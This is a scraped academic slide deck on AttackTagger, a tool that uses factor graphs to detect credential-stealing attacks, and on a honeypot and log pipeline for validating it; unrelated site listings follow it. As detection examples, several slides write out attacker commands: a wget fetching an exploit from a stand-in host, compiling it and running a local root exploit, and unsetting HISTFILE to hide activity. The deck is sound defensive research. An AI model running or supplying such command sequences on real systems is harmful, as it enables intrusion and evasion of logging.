Scalable Data Analytics Pipeline for Validation of Real-Time Attack - PowerPoint PPT Presentation

Scalable Data Analytics Pipeline for Validation of Real-Time Attack Detection Eric Badger , Phuong Cao, Alex Withers, Adam Slagell, Zbigniew Kalbarczyk, Ravi Iyer University of Illinois Urbana-Champaign 1

Overview ▪ Introduction/Motivation ▪ Challenges ▪ Attack Detection: AttackTagger ▪ Validation of AttackTagger ▪ Future Work/Conclusion 2

Research Problems ▪ How can we detect attacks before system misuse? High-accuracy, real-time attack detection tools ▪ How do we validate that our attack detection tools works on real- world data? ▪ How do we transition attack detection tools from theory to practice? 3

Attack Type: Credential-Stealing Attacks ▪ Definition: An attack where the attacker enters the system with legitimate credentials (e.g. username/password) Attacker becomes an insider ▪ 26% (32/124) of incidents at NCSA over a 5-year period were credential-stealing attacks ▪ 28% (9/32) of these attacks weren’t detected by NCSA monitors [1] Sharma, A.; Kalbarczyk, Z.; Barlow, J.; Iyer, R., "Analysis of security data from a large computing organization," in Dependable Systems & Networks (DSN), 2011 IEEE/IFIP 41st International Conference on 4

4. Escalate privilege Example Credential-Stealing Attack $ gcc vm.c -o a; ./a Linux vmsplice Local Root Exploit [+] mmap: 0xAABBCCDD [+] page: 0xDDEEFFGG Legitimate Users … # whoami 2. OS fingerprinting root 3. Download exploit $ uname -a; w alice : password123 $ wget server6.bad-domain.com/vm.c bob : password456 Linux 2.6.xx, up 1:17, 1 user … USER TTY LOGIN@ IDLE Connecting to xx.yy.zz.tt:80… connected. xxx console 18:40 1:16 HTTP 1.1 GET /vm.c 200 OK Social engineering Email phishing Firewall OpenSSH Target Password guessing System 5. Replace SSH daemon sshd: Received SIGHUP; restarting. alice : password123 bob : password456 … Attacker Monitors Monitors 1. Login remotely Bro IDS Syslog File Integrity Monitor sshd: Accepted <user> from <remote> 5

Detecting Attacks Using Factor Graphs: AttackTagger benign suspicious malicious USER benign suspicious suspicious malicious malicious STATES Factor functions EVENTS COMPILE RESTART SYS SERVICE LOGIN_REMOTELY OS_FINGERPRINT DOWNLOAD_SENSITIVE RAW $ wget bad- sshd: Received SIGHUP; sshd: Accepted <user> $ uname -a; w $ gcc vm.c -o a; ./a LOGS domain.com/vm.c restarting. time 6

How Do I Know What Events Are Important? ▪ We identified over 100 important events related to credential-stealing attacks [2] P. Cao, K. Chung, Z.Kalbarczyk, R. Iyer, and A. Slagell. Preemptive intrusion detection. HotSoS '14. [3] P. Cao, E. Badger, Z. Kalbarczyk, R. Iyer, and Adam Slagell. Preemptive intrusion detection: theoretical framework and real-world measurements. HotSoS '15. 7

AttackTagger Dataset ▪ Manually extracted data Raw logs Human-written incident reports ▪ Ideal data No noise Perfect monitors No randomness [3] P. Cao, E. Badger, Z. Kalbarczyk, R. Iyer, and Adam Slagell. Preemptive intrusion detection: theoretical framework and real-world measurements. HotSoS '15. 8

11:00:57 sshd: Failed password for root ALERT_FAILED_PASSWORD 23:08:26 sshd: Failed password for root ALERT_FAILED_PASSWORD Raw logs 23:08:30 sshd: Failed password for nobody ALERT_FAILED_PASSWORD 23:08:38 sshd: Failed password for <user> ALERT_FAILED_PASSWORD 23:08:42 sshd: Failed password for root ALERT_FAILED_PASSWORD Manual Extraction The security team received ssh suspicious alerts from <machine> for the user <user>. There were also some Bro alerts from the machine <machine>. From the Bro sshd logs the user ran the following Human-written commands: uname -a incident reports READ_HOST_CONFIGURATION unset HISTFILE ALERT_DISABLE_LOGGING wget <xx.yy.zz.tt>/abs.c -O a.c ALERT_DOWNLOAD_SENSITIVE gcc a.c -o a; ALERT_COMPILE_CODE [3] P. Cao, E. Badger, Z. Kalbarczyk, R. Iyer, and Adam Slagell. Preemptive intrusion detection: theoretical framework and real-world measurements. HotSoS '15. 9

AttackTagger Results ▪ 74.2% (46/62) malicious users correctly detected as malicious ▪ 1.52% (19/1,253) benign users incorrectly detected as malicious [3] P. Cao, E. Badger, Z. Kalbarczyk, R. Iyer, and Adam Slagell. Preemptive intrusion detection: theoretical framework and real-world measurements. HotSoS '15. 10

How to Extract Important Events ▪ Network Monitors Anything that logs activity between hosts Example: Bro ▪ Host Monitors Anything that logs activity on the host Example: OSSEC 11

Log Normalization OSSEC Logs Auth Logs ISO 8601 Epoch Time RKHunter Logs Bro Notice Logs Snoopy Logs 12

Log Normalization Extra Received Timestamp, IP Address:User, Event Info, Timestamp , 13

Log Aggregation ▪ Multiple clients, single server ▪ Encryption is necessary Thwart MITM attacks Clients Server 14

Data Pipeline Design Bro Network Example Events Traffic/Raw Honeypots Tools Logs AttackTagger Generic Log Aggregation and Message Data Data Source Monitors Log Storage Attack Tools Normalization Queue Visualization Detection 15

Public Network We Need Data! Honeypots at NCSA Logs Monitoring Honeypot ▪ NCSA server running several VMs VM VMs Logs Honeypot VMs Monitoring VM ▪ Collector (NCSA server) Private Network Normalize, aggregate, queue, detect ▪ Honeypots are low-risk Collector 16

Preliminary Honeypot Results ▪ 3 SSH Bruteforce attacks in first 3 days ▪ Downloaded and ran “/tmp/squid64” ▪ Attackers beat my monitors! (Well, sort of...) Pushed the malware Immediate file deletion 17

Where Are We Now? ▪ Honeypots are online Mining attack data ▪ Creating targeted attacks ▪ Upgrading AttackTagger factor functions ▪ Pipeline performance evaluation underway 18

Validating AttackTagger in a Real-world Environment ▪ Compare with theoretical AttackTagger results ▪ Compare and contrast AttackTagger with different attack detection models e.g. Rule-classifier, Bayesian Networks ▪ Benchmark throughput of events Can AttackTagger work in real-time? 19

Future Work ▪ Validate AttackTagger using honeypots/pipeline ▪ Transition entire pipeline into practice at NCSA ▪ Add additional monitors to data pipeline Administrator-generated events/profiles Keystroke data (e.g. iSSHD) ▪ Improve stream-processing of AttackTagger 20

Conclusion ▪ Demonstrated attack detection using factor graphs (AttackTagger) 74.2% true positive ▪ Designed and implemented data pipeline for real-world validation of attack detection tools 21

Questions? 22

Citations [1] Sharma, A.; Kalbarczyk, Z.; Barlow, J.; Iyer, R., "Analysis of security data from a large computing organization," in Dependable Systems & Networks (DSN), 2011 IEEE/IFIP 41st International Conference on [2] Phuong Cao, Key-whan Chung, Zbigniew Kalbarczyk, Ravishankar Iyer, and Adam J. Slagell. 2014. Preemptive intrusion detection. In Proceedings of the 2014 Symposium and Bootcamp on the Science of Security (HotSoS '14). ACM, New York, NY, USA, , Article 21 , 2 pages. DOI=10.1145/2600176.2600197 http://doi.acm.org/10.1145/2600176.2600197 [3] Phuong Cao, Eric Badger, Zbigniew Kalbarczyk, Ravishankar Iyer, and Adam Slagell. 2015. Preemptive intrusion detection: theoretical framework and real-world measurements. In Proceedings of the 2015 Symposium and Bootcamp on the Science of Security (HotSoS '15). ACM, New York, NY, USA, , Article 5 , 12 pages. DOI=10.1145/2746194.2746199 http://doi.acm.org/10.1145/2746194.2746199 23

Scalable Data Analytics Pipeline for Validation of Real-Time Attack - PowerPoint PPT Presentation

Scalable Data Analytics Pipeline for Validation of Real-Time Attack Detection Eric Badger , Phuong Cao, Alex Withers, Adam Slagell, Zbigniew Kalbarczyk, Ravi Iyer University of Illinois Urbana-Champaign 1 Overview Introduction/Motivation

Analytics and Data Summit 2020 Analytics and Data Summit 2020 Analytics and Data Summit 2020

Scalable Data Analytics Pipeline for Real-Time Attack Detection; Design, Validation, and

Chapter 5 Analysis: Four Level for Validation Vis/Visual Analytics, Chap 5 Validation 1 CGGM

Form Validation 1 CS380 What is form validation? 2 validation: ensuring that form's values

Validation of National Burn Severity Validation of National Burn Severity Validation of National

Real graduates, Real graduates, real transitions, real transitions, real stories: real

A Pipeline for Scalable Text Reuse Analysis Milad Alshomary Bauhaus Universitt 05.07.2018

Cache Coherence in Scalable Machines Scalable Cache Coherent Systems Scalable, distributed

Undergraduate Business Analytics Minor Spreadsheet Analytics BANA-2081 Business Analytics

LaGov LaGov Version 3.0 Updated: 12/04/2008 Validation Session Agenda Validation Session

Data validation and exploration Data validation and exploration Abhijit Dasgupta Abhijit

Data Mining II Model Validation Heiko Paulheim Why Model Validation? We have seen so far

Real-Time in the Real World: Building a State of the Art Real-Time Analytics Platform INFORMS

Building Scalable Real-Time Data Pipeline Data Fridge Vicente Valls Rios Software

LaGov LaGov Version 2.2 Updated: 12/17/08 Visit our website for Blueprint Presentations,

LaGov LaGov Validation Session Agenda Validation Session Agenda Purpose Work Session

8/17/2020 1 2 3 1 8/17/2020 4 5 6 2 8/17/2020 7 8 9 3 8/17/2020 10 11 12 4

:

TDDE45 - Lecture 5: Domain-Specifjc Languages Martin Sjlund Department of Computer and

Aim I can convert metric measures involving length. Success Criteria I can convert from

Integrand reduction for five-parton two-loop scattering amplitudes in QCD High Precision for Hard

The high-multiplicity frontier for two-loop QCD Background Numerical unitarity for 2-loop

more-than-MHV amplitudes in QCD Simon Badger 18th March 2016 MHV@30, Fermilab, 16th-19th March

Rectifiability of measures Some results m = 1 m 1 Raanan Schul (Stony Brook) Other notions